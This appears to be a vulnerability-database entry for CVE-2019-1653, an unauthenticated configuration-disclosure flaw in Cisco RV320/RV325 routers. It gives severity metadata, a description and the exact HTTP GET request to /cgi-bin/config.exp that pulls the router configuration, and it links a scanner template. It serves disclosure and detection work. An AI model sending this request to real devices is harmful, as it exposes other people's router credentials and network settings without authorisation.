| Title | Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure |
|---|---|
| Author | dwisiswant0 |
| Severity | High |
| Impact | An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks. |
| Remediation | Cisco has released firmware updates that address this vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.94378 |
| CVE ID | CVE-2019-1653 |
| CWE ID | CWE-200,CWE-284 |
| Tags | cve cve2019 packetstorm kev edb cisco router exposure vkev vuln |
Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated remote attacker to retrieve sensitive information due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information.
GET /cgi-bin/config.exp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-1653.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-1653.pcap
N/AN/A